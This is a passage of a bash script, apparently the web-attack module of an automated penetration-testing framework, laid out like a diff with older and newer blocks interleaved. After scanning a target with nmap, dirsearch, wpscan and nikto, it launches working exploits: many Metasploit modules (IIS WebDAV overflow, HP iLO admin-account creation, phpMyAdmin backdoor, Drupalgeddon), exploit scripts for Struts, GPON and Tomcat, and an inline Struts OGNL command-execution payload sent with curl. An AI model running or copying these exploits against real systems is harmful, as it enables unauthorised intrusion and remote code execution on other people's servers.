||||
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=10000 2> /dev/null
|
||||
cutycapt --url=http://$TARGET:$PORT --out=$LOOT_DIR/screenshots/$TARGET-port$PORT.jpg --insecure --max-wait=5000 2> /dev/null
|
||||
fi
|
||||
if [ "$BURP_SCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BURPSUITE SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl -X POST \"http://$BURP_HOST:$BURP_PORT/v0.1/scan\" -d \"{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}\"$RESET"
|
||||
fi
|
||||
curl -s -X POST "http://$BURP_HOST:$BURP_PORT/v0.1/scan" -d "{\"scope\":{\"include\":[{\"rule\":\"http://$TARGET:$PORT\"}],\"type\":\"SimpleScope\"},\"urls\":[\"http://$TARGET:$PORT\"]}"
|
||||
echo ""
|
||||
fi
|
||||
if [ "$NMAP_SCRIPTS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET | tee $LOOT_DIR/output/nmap-$TARGET-port$PORT
|
||||
sed -r "s/</\&lh\;/g" $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null > $LOOT_DIR/output/nmap-$TARGET-port$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/nmap-$TARGET-port$PORT 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING NMAP SCRIPTS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nmap -A -Pn -T5 -p $PORT -sV --script=/usr/share/nmap/scripts/iis-buffer-overflow.nse --script=http-vuln* $TARGET
|
||||
if [ "$PASSIVE_SPIDER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PASSIVE WEB SPIDER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | sort -u | tee $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null
|
||||
curl -sX GET "http://index.commoncrawl.org/CC-MAIN-2018-22-index?url=*.$TARGET&output=json" | jq -r .url | tee $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$WAYBACKMACHINE" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED FETCHING WAYBACK MACHINE URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -sX GET "http://web.archive.org/cdx/search/cdx?url=*.$TARGET/*&output=text&fl=original&collapse=urlkey" | tee $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$BLACKWIDOW" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER & APPLICATION SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
blackwidow -u http://$TARGET -l 3 -s y 2> /dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/* > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
blackwidow -u http://$TARGET:$PORT -l 3 -s y -v n 2> /dev/null
|
||||
cat /usr/share/blackwidow/$TARGET*/* 2> /dev/null > $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
if [ "$WEB_BRUTE_COMMONSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING COMMON FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_COMMON -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
fi
|
||||
if [ "$WEB_BRUTE_FULLSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FULL FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_FULL -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,jsp,pl,cgi,js,css,txt,html,htm
|
||||
fi
|
||||
if [ "$WEB_BRUTE_EXPLOITSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE FOR VULNERABILITIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_EXPLOITS -x 400,403,404,405,406,429,502,503,504 -F -e html
|
||||
fi
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET:$PORT -w $WEB_BRUTE_INSANE -x 400,403,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
wget http://$TARGET:$PORT/robots.txt -O $LOOT_DIR/web/robots-$TARGET:$PORT-http.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd -i $TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url http://$TARGET:$PORT --disable-tls-checks
|
||||
echo ""
|
||||
wpscan --url http://$TARGET:$PORT/wordpress/ --disable-tls-checks
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cmsmap http://$TARGET:$PORT
|
||||
echo ""
|
||||
cmsmap http://$TARGET:$PORT/wordpress/
|
||||
echo ""
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd -i $TARGET -p $PORT | tee $LOOT_DIR/web/clusterd-$TARGET-port$PORT.txt
|
||||
fi
|
||||
if [ "$CMSMAP" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CMSMAP $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cmsmap http://$TARGET:$PORT | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTa.txt
|
||||
echo ""
|
||||
cmsmap http://$TARGET/wordpress/ | tee $LOOT_DIR/web/cmsmap-$TARGET-http-port$PORTb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$WPSCAN" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wpscan --url http://$TARGET:$PORT --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTa.txt
|
||||
echo ""
|
||||
wpscan --url http://$TARGET:$PORT/wordpress/ --no-update --disable-tls-checks 2> /dev/null | tee $LOOT_DIR/web/wpscan-$TARGET-http-port$PORTb.txt
|
||||
echo ""
|
||||
fi
|
||||
if [ "$NIKTO" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-$PORT.txt
|
||||
nikto -h http://$TARGET:$PORT -output $LOOT_DIR/web/nikto-$TARGET-http-port$PORT.txt
|
||||
fi
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
clusterd -i $TARGET -p $PORT 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "80"; setg SSL false; run; set PATH /uploads/; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; run; use scanner/http/webdav_website_content; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT 80; set WAIT 2; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT 80; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT 80; set SSL false; run; back;exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port $PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache_struts_cve-2017-5638.py -u http://$TARGET:$PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache_struts_cve-2017-9805.py -u http://$TARGET:$PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE JAKARTA RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET:$PORT | head -n 1
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 CVE-2018-11776 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/apache-struts-CVE-2018-11776.py -u http://$TARGET:$PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
ruby $INSTALL_DIR/bin/drupalgeddon2.rb http://$TARGET:$PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/cisco-asa-traversal.py http://$TARGET:$PORT
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:$PORT
|
||||
cd $INSTALL_DIR
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING GPON ROUTER EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/gpon_rce.py http://$TARGET:$PORT 'whoami'
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $INSTALL_DIR/bin/tomcat-cve-2017-12617.py -u http://$TARGET:$PORT
|
||||
|
||||
if [ $SCAN_TYPE == "DOMAIN" ]; then
|
||||
if [ $OSINT == "0" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SKIPPING GOOGLE HACKING QUERIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
else
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
goohak $TARGET > /dev/null
|
||||
fi
|
||||
if [ "$CLUSTERD" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING INURLBR OSINT QUERIES $RESET"
|
||||
echo -e "$OKRED ENUMERATING WEB SOFTWARE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET.txt
|
||||
rm -Rf output/ cookie.txt exploits.conf
|
||||
GHDB="1"
|
||||
clusterd -i $TARGET -p $PORT 2> /dev/null | tee $LOOT_DIR/web/clusterd-$TARGET-http-port$PORT.txt
|
||||
fi
|
||||
if [ "$SHOCKER" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port $PORT | tee $LOOT_DIR/web/shocker-$TARGET-port$PORT.txt
|
||||
fi
|
||||
if [ "$JEXBOSS" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JEXBOSS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd /tmp/
|
||||
python /usr/share/sniper/plugins/jexboss/jexboss.py -u http://$TARGET:$PORT | tee $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw > $LOOT_DIR/web/jexboss-$TARGET-port$PORT.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/web/jexboss-$TARGET-port$PORT.raw 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
if [ $METASPLOIT_EXPLOIT = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RPORT "$PORT"; setg SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT UTF8 TRAVERSAL EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/http/tomcat_utf8_traversal; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-tomcat_utf8_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE OPTIONS BLEED EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use scanner/http/apache_optionsbleed; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-apache_optionsbleed.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING HP ILO AUTH BYPASS EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL false; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET--port$PORT-hp_ilo_create_admin_account.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port$PORT-hp_ilo_create_admin_account.raw > $LOOT_DIR/output/msf-$TARGET--port$PORT-hp_ilo_create_admin_account.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET--port$PORT-hp_ilo_create_admin_account.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON HTTP PARAMETER SQL INJECTION CVE-2014-3704 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/drupal_drupageddon; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-drupal_drupageddon.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; set WAIT 2; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-ms15_034_http_sys_memory_dump.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET--port$PORT-badblue_passthru.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET--port$PORT-badblue_passthru.raw > $LOOT_DIR/output/msf-$TARGET--port$PORT-badblue_passthru.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET--port$PORT-badblue_passthru.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST "$TARGET"; set RPORT 80; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-php_cgi_arg_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOITS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
